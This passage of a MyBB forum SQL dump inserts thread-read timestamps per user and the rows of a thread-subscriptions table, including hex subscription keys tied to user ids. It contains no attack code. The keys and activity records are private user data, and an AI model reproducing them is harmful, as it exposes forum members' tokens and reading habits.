VALUES ('180', '53', '1352554560'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('450', '53', '1352554561'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('971', '341', '1352555192'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '341', '1352555448'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '341', '1352555438'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('959', '341', '1352555517'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1147', '341', '1352555587'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1098', '341', '1352555606'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('922', '341', '1352555719'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('957', '341', '1352555731'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '257', '1352557579'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '228', '1352665799'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '257', '1352558545'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('426', '228', '1352558350'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('465', '53', '1352561922'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1171', '53', '1352561956'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1050', '82', '1352562105'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '1', '1352772299'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '342', '1352571758'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('465', '1', '1352571884'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '342', '1352658913'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '4', '1352571989'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('19', '342', '1352571960'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1099', '342', '1352571974'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1047', '342', '1352658946'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('991', '4', '1352572120'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '61', '1352580833'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '53', '1352575333'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '53', '1352625357'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('592', '53', '1352575408'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '61', '1352591051'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '1', '1352662322'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '1', '1352664448'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1240', '61', '1352577397'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '1', '1352664323'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '61', '1352583619'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '82', '1352647909'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '82', '1352662110'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '82', '1352647920'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1249', '82', '1352769929'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '228', '1352580220'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '228', '1352583811'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1249', '228', '1352642065'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '228', '1352665871'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1249', '1', '1352580597'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '82', '1352769139'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1050', '228', '1352583761'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '228', '1352583861'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1246', '61', '1352587433'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '62', '1352796167'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1249', '62', '1352587616'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('991', '62', '1352587627'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '62', '1352587717'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1237', '62', '1352646739'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('792', '62', '1352646726'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('315', '62', '1352588387'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1250', '62', '1352620736'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1250', '82', '1352589058'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1237', '1', '1352589787'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('79', '1', '1352589705'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('398', '61', '1352591150'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('535', '1', '1352592339'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '61', '1352597467'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1170', '4', '1352597601'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '4', '1352597677'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '4', '1352597705'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '4', '1352597812'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1170', '82', '1352762681'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1251', '82', '1352604416'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1252', '82', '1352650143'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1252', '1', '1352661258'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '61', '1352599246'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '61', '1352599256'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('991', '61', '1352601493'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1081', '82', '1352602714'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1251', '1', '1352603862'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1081', '1', '1352603417'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1170', '1', '1352603955'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('563', '343', '1352609076'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1225', '343', '1352609935'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1122', '343', '1352609942'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('335', '343', '1352609966'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1170', '257', '1352617562'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1251', '257', '1352617664'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1252', '257', '1352618019'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '262', '1352619731'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '262', '1352619751'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '262', '1352619799'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1236', '262', '1352619851'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '62', '1352620791'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '53', '1352634225'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '333', '1352625017'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1243', '53', '1352625388'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '205', '1352633870'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '205', '1352634280'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1254', '205', '1352809466'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '53', '1352663074'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '205', '1352635342'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '228', '1352655344'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1237', '228', '1352642109'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('418', '228', '1352642172'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1254', '228', '1352642230'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '228', '1352642294'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1066', '228', '1352642360'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1234', '53', '1352645334'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1254', '258', '1352645469'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '62', '1352646430'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '82', '1352771268'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1252', '228', '1352650294'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1170', '228', '1352648588'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1040', '228', '1352648876'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1252', '53', '1352649996'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1173', '61', '1352649954'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1209', '228', '1352653393'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1255', '345', '1352656175'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '345', '1352655431'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '345', '1352655118'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('249', '345', '1352655211'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1255', '228', '1352665823'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '345', '1352656174'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1252', '345', '1352656392'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1156', '228', '1352657664'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1062', '228', '1352657674'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1140', '53', '1352660913'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1255', '82', '1352662019'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1255', '1', '1352662960'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '1', '1352662506'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '53', '1352662536'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('124', '1', '1352662546'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('281', '53', '1352662553'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1201', '1', '1352662786'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('135', '1', '1352663994'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1242', '1', '1352665288'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '257', '1352679999'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '61', '1352738376'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '1', '1352823595'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1148', '61', '1352762030'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '82', '1352769350'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1219', '82', '1352769141'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1202', '82', '1352762765'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('19', '325', '1352763176'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('418', '325', '1352763176'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1047', '325', '1352763240'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '61', '1352764869'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1093', '82', '1352770451'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1176', '82', '1352770456'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1093', '4', '1352770524'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1258', '346', '1352809410'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1093', '2', '1352770609'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1093', '1', '1352770750'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1192', '1', '1352771036'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '306', '1352771191'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('75', '306', '1352771264'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1258', '82', '1352771422'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '306', '1352771619'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('532', '82', '1352771717'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '1', '1352772709'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1144', '222', '1352772939'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1093', '61', '1352773979'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1211', '4', '1352774384'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '222', '1352814806'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1223', '1', '1352785168'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1259', '334', '1352812006'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1260', '334', '1352785935'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '334', '1352786185'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1235', '334', '1352786452'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '54', '1352788585'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1259', '1', '1352823640'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1202', '62', '1352796084'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1036', '54', '1352796654'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('406', '54', '1352798443'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('672', '54', '1352798729'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('456', '54', '1352819623'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1261', '62', '1352820831'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1261', '54', '1352799639'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('146', '54', '1352815041'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '206', '1352800806'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('959', '206', '1352801450'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '54', '1352803937'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1232', '54', '1352804653'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '54', '1352804690'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '205', '1352809091'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1259', '205', '1352809844'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1223', '205', '1352809897'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1238', '205', '1352809997'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('532', '67', '1352811022'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1142', '67', '1352811030'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('177', '67', '1352811135'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1245', '54', '1352814553'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('204', '54', '1352815134'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('455', '54', '1352815334'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '258', '1352817399'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1091', '54', '1352817481'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('197', '54', '1352817648'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1260', '258', '1352817679'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1176', '258', '1352817686'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '258', '1352817692'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('452', '54', '1352819396'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('516', '54', '1352819399'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '67', '1352820068'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1238', '67', '1352820211'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1239', '67', '1352820670'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '62', '1352820859'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '53', '1352822647'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '150', '1352823143'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_threadsubscriptions`; CREATE TABLE `mybb_threadsubscriptions` ( `sid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `tid` int(10) unsigned NOT NULL DEFAULT '0', `notification` int(1) NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `subscriptionkey` varchar(32) NOT NULL DEFAULT '', PRIMARY KEY (`sid`), KEY `uid` (`uid`), KEY `tid` (`tid`,`notification`) ) ENGINE=MyISAM AUTO_INCREMENT=161 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_threadsubscriptions` WRITE; INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('1', '13', '44', '1', '1342146175', 'ed14a522a8d0192f108f2d860f24480e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('2', '44', '74', '1', '1344830641', 'c8793f75cb1631d9e900551f31f2f8b2'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('3', '44', '54', '1', '1344831216', 'd1c39e4e66ca661a7e596de6f07b8acb'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('4', '48', '105', '0', '1344965203', '45a8a03e76cda8cda6ddb50d45442e3a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('5', '48', '48', '0', '1344988840', '44c4853d875ef9095ec900ca8e2eed64'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('6', '82', '161', '1', '1345520270', '07fc0a5e6497c90c1e611fce6f97b474'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('7', '82', '152', '1', '1345520696', 'd7fe3d32b37582aa7f99d58d5a6c1e70'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('8', '82', '167', '1', '1345522131', '6e49bf1285c7a9969dcd02089e5b0ed6'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('36', '82', '174', '1', '1345595734', '1863201bbabd992e5dfd2663a596b5fc'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('10', '82', '166', '1', '1345554230', '964087317687b64dfbdc6729f16126f2'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('11', '82', '43', '1', '1345554314', 'f5545f7d7039701a3f75b98de987df1c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('12', '82', '31', '1', '1345554500', 'f4ff63249044f2027533bffb8311f1e0'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('13', '82', '59', '1', '1345554867', '78e41f175aa6ba6e0f6eb6fd9451e866'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('14', '82', '158', '1', '1345555006', '2ae0a2c54b01cdd3a63bd3815d34f4e4'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('15', '82', '91', '1', '1345555125', '345d6d67f14661b037d1ec202ddf915f'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('16', '82', '134', '1', '1345555390', '4952798ffabd352a990274ab9ca61f6d'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('17', '82', '171', '1', '1345555795', '07cd536c877a9b9adc76be51408116ea'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('18', '82', '112', '1', '1345555945', 'e13376f10cefd05e019cc8d1aeae6209'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('19', '82', '141', '1', '1345556144', 'a4990d850c55b3c9968c8247d2cc2c71'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('20', '82', '160', '1', '1345556275', 'a6ededffd5d4ab1fe5818adebdbd8688'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('21', '82', '139', '1', '1345556489', 'e541661d7c25571bd72586215d065ad1'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('22', '82', '74', '1', '1345556678', '8fabe71d8b21ea09ee015d654b2d5d49'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('23', '82', '127', '1', '1345556827', '91810c635294430108806a7a83d8d03c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('24', '82', '135', '1', '1345556962', '3fe9a0310b9969733e8b6b2ab3682e74'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('25', '82', '164', '1', '1345557147', '1fdfa3d190dbf8ba240d42047762564c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('26', '82', '146', '1', '1345557294', '6c20f7c45d8866b0ea759c908440d98d'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('27', '82', '79', '1', '1345557524', 'ac8ec1f83935beaf31b0d2beb0683bdb'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('28', '82', '163', '1', '1345557636', 'd2bf6346365f8fe12801c9ac2d5a5c05'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('29', '82', '2', '1', '1345557853', 'c4663f80b155157a20ad1ebfcaec52aa'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('30', '82', '83', '1', '1345557952', '66cb63a7c47e4de06db924c23c31131c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('31', '82', '138', '1', '1345558150', '12bb2aeffa1aa41785e6c17879f6e719'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('32', '82', '162', '1', '1345559185', '289b84567a39a3ed14c454893dd70e36'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('33', '82', '104', '1', '1345559836', '75d1e7329869781b8e6bb6829d8a1368'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('34', '82', '16', '1', '1345560022', 'e3d69948b2b57ab45fb3a67d902d2e33'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('35', '82', '51', '1', '1345560297', '719758174868d4fe7df24d9a68c331f5'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('37', '82', '175', '1', '1345595912', 'c431c24b0150508807bc6cdadf016425'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES 